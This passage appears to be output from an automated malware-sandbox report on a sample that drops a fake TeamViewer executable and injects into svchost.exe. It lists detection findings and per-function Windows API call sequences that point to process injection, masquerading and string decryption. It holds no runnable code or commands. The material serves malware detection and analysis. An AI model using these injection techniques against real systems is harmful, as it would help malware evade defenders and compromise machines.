Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_00544B6A	6_2_00544B6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004B9F5A	6_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_00546FFB	6_2_00546FFB
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004A0FB2	6_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026CB269	19_3_026CB269

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: String function: 0040F6FE appears 64 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: String function: 0053BCB5 appears 478 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: String function: 0053E5C8 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: String function: 0040DFA6 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: String function: 004A1B0C appears 248 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: String function: 0053BCE8 appears 68 times

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF3610 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,

3_2_6EAF3610

Contains functionality to call native functions

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,	1_2_00401000
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,	3_2_6EAFB0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,	3_2_6EAF8400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFB270 NtResumeThread,NtClose,HeapFree,	3_2_6EAFB270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFADE0 NtProtectVirtualMemory,	3_2_6EAFADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFB1F0 NtSuspendThread,NtClose,	3_2_6EAFB1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFAFC0 NtGetContextThread,NtSetContextThread,	3_2_6EAFAFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FrostCrashedWindow,FrostCrashedWindow,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,InvertRect,InvertRect,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,	3_2_6EAF8510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,	3_2_6EAF14E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,	3_2_6EAF4EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache,	3_2_6EAFB2D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	3_2_6EAF2ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF18D0 NtProtectVirtualMemory,	3_2_6EAF18D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFAE20 NtOpenThread,	3_2_6EAFAE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,	3_2_6EAF1C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF2640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,	3_2_6EAF2640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,	3_2_6EAF23B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,	3_2_6EAF7790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,	3_2_6EAF19F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFAD39 NtProtectVirtualMemory,	3_2_6EAFAD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFA500 NtQueryVirtualMemory,	3_2_6EAFA500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,	3_2_6EAF2750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,InvertRect,InvertRect,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	3_2_6EAF6D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFAFC0 NtGetContextThread,NtSetContextThread,	6_2_6EAFAFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFADE0 NtProtectVirtualMemory,	6_2_6EAFADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	6_2_6EAF6D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,	6_2_6EAF7790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,	6_2_6EAF8400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,	6_2_6EAF8510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFB270 NtResumeThread,NtClose,HeapFree,	6_2_6EAFB270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,	6_2_6EAFB0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFB1F0 NtSuspendThread,NtClose,	6_2_6EAFB1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,wsprintfA,CloseHandle,CloseHandle,CloseHandle,	6_2_6EAF4EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	6_2_6EAF2ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFAE20 NtOpenThread,	6_2_6EAFAE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,	6_2_6EAF1C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFAD39 NtProtectVirtualMemory,	6_2_6EAFAD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF18D0 NtProtectVirtualMemory,	6_2_6EAF18D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,	6_2_6EAF19F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF2640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,	6_2_6EAF2640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,	6_2_6EAF2750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,	6_2_6EAF14E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFA500 NtQueryVirtualMemory,	6_2_6EAFA500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache,	6_2_6EAFB2D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,	6_2_6EAF23B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,DestroyAcceleratorTable,GetProcessHeap,HeapAlloc,GetComputerNameExW,DestroyAcceleratorTable,DestroyAcceleratorTable,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,lstrcmp,lstrcmp,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,DestroyAcceleratorTable,DestroyAcceleratorTable,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,lstrcmp,lstrcmp,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,	8_2_6EAF8510
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,	8_2_6EAFB0A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,	8_2_6EAF14E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,	8_2_6EAF4EF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache,	8_2_6EAFB2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	8_2_6EAF2ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF18D0 NtProtectVirtualMemory,	8_2_6EAF18D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFAE20 NtOpenThread,	8_2_6EAFAE20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,	8_2_6EAF8400
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,	8_2_6EAF1C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFB270 NtResumeThread,NtClose,HeapFree,	8_2_6EAFB270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF2640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,	8_2_6EAF2640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,	8_2_6EAF23B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,	8_2_6EAF7790
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFADE0 NtProtectVirtualMemory,	8_2_6EAFADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,	8_2_6EAF19F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFB1F0 NtSuspendThread,NtClose,	8_2_6EAFB1F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFAFC0 NtGetContextThread,NtSetContextThread,	8_2_6EAFAFC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFAD39 NtProtectVirtualMemory,	8_2_6EAFAD39
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFA500 NtQueryVirtualMemory,	8_2_6EAFA500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,	8_2_6EAF2750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	8_2_6EAF6D50

PE file does not import any functions

Source: Teamviewer_Resource_ja.dll.1.dr

Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: 77Etc0bR2v.exe, 00000001.00000002.248818109.0000000000409000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameTeamViewer.exel& vs 77Etc0bR2v.exe

PE file contains strange resources

Source: 77Etc0bR2v.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
